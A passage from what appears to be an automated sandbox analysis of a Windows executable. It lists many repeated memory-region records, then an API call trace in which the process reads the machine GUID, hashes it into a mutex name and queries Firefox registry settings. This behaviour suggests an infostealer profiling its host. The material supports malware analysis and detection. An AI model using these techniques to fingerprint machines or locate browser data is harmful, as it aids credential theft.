end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1685 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1686 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1687 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1688 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1689 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1690 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1691 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1692 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1693 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1694 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1695 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1696 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1697 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1698 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1699 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1700 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1701 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1702 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1703 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1704 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1705 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1706 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1707 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1708 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1709 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1710 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1711 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1712 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1713 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1714 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1715 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1716 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1717 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1718 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1719 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1720 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1721 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1722 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1723 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1724 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1725 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1726 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1727 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1728 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1729 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1730 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1731 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1732 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1733 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1734 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1735 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1736 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1737 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1738 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1739 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1740 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1741 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1742 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1743 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1744 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1745 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1746 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1747 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1748 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1749 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1750 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1751 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1752 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1753 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1754 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1755 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1756 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1757 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1758 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1759 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1760 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1761 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1762 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1763 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1764 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1765 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1766 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1767 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1768 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1769 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1770 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1771 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1772 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1773 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1774 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1775 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1776 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1777 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1778 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1779 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1780 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1781 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1782 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1783 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1784 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1785 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1786 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1787 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1788 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1789 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1790 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1791 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1792 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1793 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1794 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1795 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1796 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1797 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1798 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1799 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1800 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1801 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1802 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1803 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1804 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1805 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1806 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1807 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1808 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1809 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1810 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1811 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1812 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1813 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1814 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1815 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1816 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1817 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1818 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1819 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1820 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1821 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1822 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1823 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1824 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1825 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1826 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1827 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1828 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1829 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1830 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1831 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1832 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1833 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1834 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1835 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1836 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1837 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1838 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1839 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1840 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1841 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1842 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1843 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Thread: id = 8 os_tid = 0xb4c [0125.260] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny" [0125.260] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0125.449] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x6a7eb0*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe" [0125.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0125.450] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\cbgsujmwws.exe", lpSrch="-u") returned 0x0 [0125.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0125.451] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\jplmbcuny", lpSrch="-u") returned 0x0 [0125.452] SetErrorMode (uMode=0x3) returned 0x0 [0125.453] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0125.454] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x75b90000 [0125.455] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x753d0000 [0125.468] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fd7c | out: lpWSAData=0x19fd7c) returned 0 [0125.481] GetProcessHeap () returned 0x6a0000 [0125.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b4378 [0125.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.482] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fedc | out: phkResult=0x19fedc*=0x178) returned 0x0 [0125.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.484] RegQueryValueExA (in: hKey=0x178, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x6b4378, lpcbData=0x19fed8*=0x208 | out: lpType=0x0, lpData=0x6b4378*=0x30, lpcbData=0x19fed8*=0x25) returned 0x0 [0125.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.491] RegCloseKey (hKey=0x178) returned 0x0 [0125.492] GetProcessHeap () returned 0x6a0000 [0125.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6ab688 [0125.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.493] CryptAcquireContextW (in: phProv=0x19febc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19febc*=0x6a66f8) returned 1 [0125.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.941] CryptCreateHash (in: hProv=0x6a66f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fec0 | out: phHash=0x19fec0) returned 1 [0125.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.943] CryptHashData (hHash=0x6ad6a0, pbData=0x6b4378, dwDataLen=0x24, dwFlags=0x0) returned 1 [0125.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.944] CryptGetHashParam (in: hHash=0x6ad6a0, dwParam=0x2, pbData=0x6ab688, pdwDataLen=0x19feb8, dwFlags=0x0 | out: pbData=0x6ab688, pdwDataLen=0x19feb8) returned 1 [0125.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.946] CryptDestroyHash (hHash=0x6ad6a0) returned 1 [0125.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0125.947] CryptReleaseContext (hProv=0x6a66f8, dwFlags=0x0) returned 1 [0125.947] GetProcessHeap () returned 0x6a0000 [0125.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x31) returned 0x6ad6a0 [0125.947] GetProcessHeap () returned 0x6a0000 [0125.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab688 | out: hHeap=0x6a0000) returned 1 [0125.948] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ad6a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0125.948] GetProcessHeap () returned 0x6a0000 [0125.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x42) returned 0x6b51f0 [0125.948] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6ad6a0, cbMultiByte=-1, lpWideCharStr=0x6b51f0, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0125.949] GetProcessHeap () returned 0x6a0000 [0125.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6b4f58 [0125.949] GetProcessHeap () returned 0x6a0000 [0125.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b51f0 | out: hHeap=0x6a0000) returned 1 [0125.949] GetProcessHeap () returned 0x6a0000 [0125.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad6a0 | out: hHeap=0x6a0000) returned 1 [0125.949] GetProcessHeap () returned 0x6a0000 [0125.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4378 | out: hHeap=0x6a0000) returned 1 [0125.950] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x180 [0125.950] GetLastError () returned 0x0 [0125.950] GetProcessHeap () returned 0x6a0000 [0125.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1388) returned 0x6b5c98 [0125.950] GetProcessHeap () returned 0x6a0000 [0125.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab580 [0125.982] GetProcessHeap () returned 0x6a0000 [0125.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6b7028 [0125.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0125.983] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb98*=0x104 | out: pdwType=0x0, pvData=0x6b7028, pcbData=0x19fb98*=0x104) returned 0x2 [0125.984] GetProcessHeap () returned 0x6a0000 [0125.984] HeapFree (in: hHeap=0x6a0000, 